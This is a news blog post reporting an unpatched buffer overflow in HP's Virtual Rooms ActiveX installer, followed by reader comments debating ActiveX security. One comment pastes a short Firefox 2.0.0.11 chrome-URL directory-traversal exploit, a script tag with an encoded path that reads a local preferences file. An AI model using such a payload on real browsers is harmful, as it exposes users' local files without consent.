HP: The ActiveX security follies continue

HP: The ActiveX security follies continue

Summary: Fresh off a series of security problems with software included on HP laptops, the company is under the gun again, say security researchers. One common thread: HP vulnerabilities due to ActiveX issues.

SHARE:

Fresh off a series of security problems with software included on HP laptops, the company is under the gun again, say security researchers. One common thread: HP vulnerabilities due to ActiveX issues.

The latest HP vulnerability--discovered by security researcher Elazar Broad--involves the HP Virtual Rooms Install. Virtual Rooms is a suite of online collaboration, training and support tools. Several properties are vulnerable to buffer overflows.

In his advisory, Broad writes:

HP uses an ActiveX control to install the Virtual Rooms client. Several properties including AuthenticationURL, PortalAPIURL, cabroot are vulnerable to a buffer overflow.

hpvirtualrooms14.dll version 1.0.0.100 HP Virtual Rooms Install {00000014-9593-4264-8B29-930B3E4EDCCD} Implements IObjectSafety

Secunia rates the flaw "highly critical." The flaw can be exploited to execute arbitrary code. The flaw is unpatched.

If all of these ActiveX problems sound familiar that's because HP vulnerabilities spring up regularly. Last month, a Polish hacker porkythepig found a zero-day vulnerability in HP laptops that leave the PC unbootable. Before that HP confirmed a backdoor on 82 laptop models.

Can we get just a little testing at HP?

Also see Ryan Naraine's take.

Topics: Hardware, Enterprise Software, Hewlett-Packard, Laptops, Mobility, Security, Software, Software Development

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

13 comments
Log in or register to join the discussion
  • ActiveX has always been a security problem!

    I still don't understand why ActiveX has been so successful in
    spite of it being a known security issue!
    kd5auq
    • When the only tool you know is a Hammer...

      Everything starts looking like a nail!

      This is my main 'beef' with Microsoft-only developers. They only know what Microsoft says, and don't understand that they are not the best-of-breed for much, if anything.

      Fact is, if you avoid using their tools and technologies, your project has a better chance of success. DCOM comes to mind, and we summarily dismissed it in favor of CORBA.

      Your mileage may vary, but about the only Microsoft 'technology' we use in our development environment is Windows - and that's being phased out too.

      -Mike
      SpikeyMike
      • Well from a company point of view...

        Go with the OS/Browser with > 90% deployment, what else is there to develop for ??? This is where the business will get the most bang for their software development $$$
        mrOSX
        • Platform is one thing..

          ... but the tools you use to develop for that platform are another.

          As a long-time windows developer, I only used Microsoft tools when forced to. Previous experience has taught me well.

          For example, I did a contract for the Navy, writing a rather large system to track their maintenance documentation. They required that I use VB for the front end, as their in-house staff was going to support it. Even though it was an N-Tier application, with CORBA servers and lots of C code on the server and in client-side DLLs, the majority of the maintenance was to be done by entry-level VB types.

          I *never* would have recommended VB for the job, as prior experience shows that it fails when the application is large or complex. This is an example of the mindset that professional developers face - The only tools they (management) know is what Microsoft delivers. It's up to us, as the professionals, to know what's out there and to make informed suggestions.

          Otherwise, you're just another softie.

          -Mike
          SpikeyMike
    • Look at IE

      Another security freak show that's been surprisingly successful.

      And Outlook.

      Just bizarre.
      Chad_z
    • ActiveX not the problem

      You an write code that is vulnerable to a buffer overflow in any language.
      Just ask Apple about QuickTime.
      Or look at the Morris worm.
      Oracle anyone?

      Banks in South Korea use ActiveX technology extensively, and you don't hear about problems there.

      ActiveX is has been used successfully (and very well) all over the world. Don't blame the hammer when the fool swinging it misses
      mdemuth
      • Uh...

        that's because when they catch the perp he/she is usually executed. ]:)
        Linux User 147560
        • Nice excuse, any facts?

          thought not.
          Make up any reason you want. It only proves how sad your viewpoint is.
          mdemuth
  • Why ActiveX is the problem

    An ActiveX control sitting on your harddrive can be invoked by any webpage you view with IE. C:\fubar\install.exe cannot be invoked by IE, unless you list it as a "helper application".
    Knorthern Knight
    • lke a java applet, like a firefox addons...

      lke a java applet, like a firefox extensions/addons...
      qmlscycrajg
  • Hp should learn to program safe activex controls

    Hp should learn to program safe activex controls
    qmlscycrajg
  • Firefox 2.0.0.11 Chrome Privilege Escalation vulnerability

    Firefox 2.0.0.11 Chrome Privilege Escalation vulnerability
    Gerry Eisenhaur found a issue in Firefox that allows chrome privilege escalation. This is due to weak normalization between URI's that are handled and passed through Firefox with various path encoding methods.
    It's a common mistake in browser software not to translate encoded values back to their correct values and meaning.

    I really hope browser vendors take a little more care in handling any resource identifier internally, because this can lead to serious issues.
    http://www.hiredhacker.com/2008/01/19/firefox-chrome-url-handling-directory-traversal/

    exploit:
    <script>pref = function(x, y){document.write(x + ' -> ' + y +
    '<br>');};</script>
    <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e
    %2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files
    %2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>
    qmlscycrajg
  • Testing, what's that and will it cost us any money? ;)

    "Yes sir, it will add substantially to our bill"
    "Forget about testing, lets just push our bundled crap out there"
    "Yes sir, right away sir"

    - John Musbach
    John Musbach